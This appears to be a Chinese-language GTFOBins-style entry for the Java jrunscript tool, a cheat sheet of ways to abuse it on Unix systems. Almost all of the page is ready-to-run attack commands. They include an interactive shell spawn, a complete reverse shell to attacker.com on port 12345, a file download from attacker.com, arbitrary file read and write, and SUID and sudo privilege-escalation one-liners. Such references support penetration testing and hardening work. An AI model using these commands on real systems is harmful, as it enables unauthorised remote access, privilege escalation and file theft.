.. / jrunscript

shell

用来生成一个交互式的系统shell。

• jrunscript -e "exec('/bin/sh -c \$@|sh _ echo sh <$(tty) >$(tty) 2>$(tty)')"

reverse-shell

向监听的端口发送反向shell，以打开远程网络访问。

• Run nc -l -p 12345 on the attacker box to receive the shell.

  export RHOST=attacker.com
  export RPORT=12345
  jrunscript -e 'var host='"'""$RHOST""'"'; var port='"$RPORT"';
  var p=new java.lang.ProcessBuilder("/bin/bash", "-i").redirectErrorStream(true).start();
  var s=new java.net.Socket(host,port);
  var pi=p.getInputStream(),pe=p.getErrorStream(),si=s.getInputStream();
  var po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){
  while(pi.available()>0)so.write(pi.read());
  while(pe.available()>0)so.write(pe.read());
  while(si.available()>0)po.write(si.read());
  so.flush();po.flush();
  java.lang.Thread.sleep(50);
  try {p.exitValue();break;}catch (e){}};p.destroy();s.close();'
  

file-download

下载远程文件。

• Fetch a remote file via HTTP GET request.

  URL=http://attacker.com/file_to_get
  LFILE=file_to_save
  jrunscript -e "cp('$URL','$LFILE')"
  

file-write

将数据写入文件中。

• jrunscript -e 'var fw=new java.io.FileWriter("./要写入的文件"); fw.write("DATA"); fw.close();'

file-read

从文件中读取数据。

• jrunscript -e 'br = new BufferedReader(new java.io.FileReader("要读取的文件路径")); while ((line = br.readLine()) != null) { print(line); }'

suid

suid是一种授予文件的权限类型，它允许用户使用者以文件所有者的权限来执行文件。

• This has been found working in macOS but failing on Linux systems.

  ./jrunscript -e "exec('/bin/sh -pc \$@|sh\${IFS}-p _ echo sh -p <$(tty) >$(tty) 2>$(tty)')"

sudo

如果二进制文件被 sudo 允许以超级用户身份运行，可能被用于访问文件系统、提升或维持特权访问。

• sudo jrunscript -e "exec('/bin/sh -c \$@|sh _ echo sh <$(tty) >$(tty) 2>$(tty)')"